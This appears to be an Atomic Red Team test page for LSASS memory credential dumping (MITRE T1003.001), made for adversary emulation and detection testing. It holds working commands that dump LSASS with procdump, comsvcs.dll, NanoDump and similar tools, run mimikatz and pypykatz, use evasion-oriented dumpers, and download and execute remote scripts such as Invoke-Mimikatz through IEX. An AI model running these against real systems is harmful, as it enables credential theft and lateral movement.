# T1003.001 - LSASS Memory
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)


Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)


## Atomic Tests

### Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.

Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.

If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install the ProcDump tool first.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\procdump.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\procdump.exe") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "PathToAtomicsFolder\..\ExternalPayloads\procdump.exe" -Force

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\procdump.exe" -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 1

#### Cleanup: 
```cmd
del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dllThe memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.

Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 2

#### Cleanup: 
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. 
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.

If you see a message saying \"The system cannot find the path specified.\", try using the  get-prereq_commands to download the  tool first.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe") -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe"

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe"
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 3

#### Cleanup: 
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.

https://github.com/helpsystems/nanodump

Upon successful execution, you should find the nanondump.dmp file in the temp directory

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)

##### Check Prereq Commands:
```cmd
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/fortra/nanodump/blob/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" 

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 4

#### Cleanup: 
```cmd
del "%temp%\nanodump.dmp" >nul 2> nul
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Dump LSASS.exe Memory using Windows Task ManagerThe memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** windowsRun it with these steps!1. Open Task Manager:
  On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
  on the task bar and selecting "Task Manager".

2. Select lsass.exe:
  If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
  and select it for manipulation.

3. Dump lsass.exe memory:
  Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.


### Atomic Test #6 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path "PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe" | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

```
##### Description: Lsass dump must exist at specified location (#{input_file})

##### Check Prereq Commands:
```cmd
cmd /c "if not exist %tmp%\lsass.DMP (exit /b 1)"

```
##### Get Prereq Commands:
```cmd
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe" "sekurlsa::minidump %tmp%\lsass.DMP" "sekurlsa::logonpasswords full" exit
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 6

### Atomic Test #7 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::

Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

Successful execution of this test will display multiple usernames and passwords/hashes to the screen.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Computer must have python 3 installed

##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%

```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"

```
##### Description: Computer must have pip installed

##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%

```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"

```
##### Description: pypykatz must be installed and part of PATH

##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%

```
##### Get Prereq Commands:
```cmd
pip install pypykatz

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
pypykatz live lsa
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 7

### Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.

Author of Out-Minidump: Matthew Graeber (@mattifestation)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 8

#### Cleanup: 
```powershell
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe

Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.

If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install the ProcDump tool first.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\procdump.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\procdump.exe") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "PathToAtomicsFolder\..\ExternalPayloads\procdump.exe" -Force

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\procdump.exe" -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 9

#### Cleanup: 
```cmd
del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 9 -Cleanup

### Atomic Test #10 - Powershell MimikatzDumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 10

### Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5
Use createdump executable from .NET to create an LSASS dump.

[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: .Net v5 must be installed

##### Check Prereq Commands:
```powershell
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 11 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 11

#### Cleanup: 
```powershell
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 11 -Cleanup

### Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.

Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Computer must have xordump.exe

##### Check Prereq Commands:
```powershell
if (Test-Path 'C:\Windows\Temp\xordump.exe') {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile C:\Windows\Temp\xordump.exe

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 12 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
C:\Windows\Temp\xordump.exe -out C:\Windows\Temp\lsass-xordump.t1003.001.dmp -x 0x41
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 12

#### Cleanup: 
```powershell
Remove-Item C:\Windows\Temp\lsass-xordump.t1003.001.dmp -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 12 -Cleanup

### Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exeThe memory of lsass.exe is often dumped for offline credential theft attacks. 
This can be achieved with lolbin rdrleakdiag.exe. 

Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and  $env:TEMP\results_<PID>.hlk.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 13

#### Cleanup: 
```powershell
Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 13 -Cleanup

### Atomic Test #14 - Dump LSASS.exe Memory through Silent Process Exit
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a 
memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism 
introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger
specific actions for a monitored process in one of two scenarios; either the process terminates
itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API. 
The major advantage of this technique is that it does not cause lsass.exe to crash, and since 
WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides 
the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process, 
from an attacker standpoint this is appealing as their illicit credential extraction will 
appear benign because from a defender’s viewpoint it’s within the realm of normal activity.

Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)

##### Check Prereq Commands:
```cmd
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/fortra/nanodump/blob/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 14 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "%temp%\SilentProcessExit"
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 14

#### Cleanup: 
```cmd
rmdir "%temp%\SilentProcessExit" /s /q >nul 2> nul
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 14 -Cleanup

## Detection
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.

On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.

Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.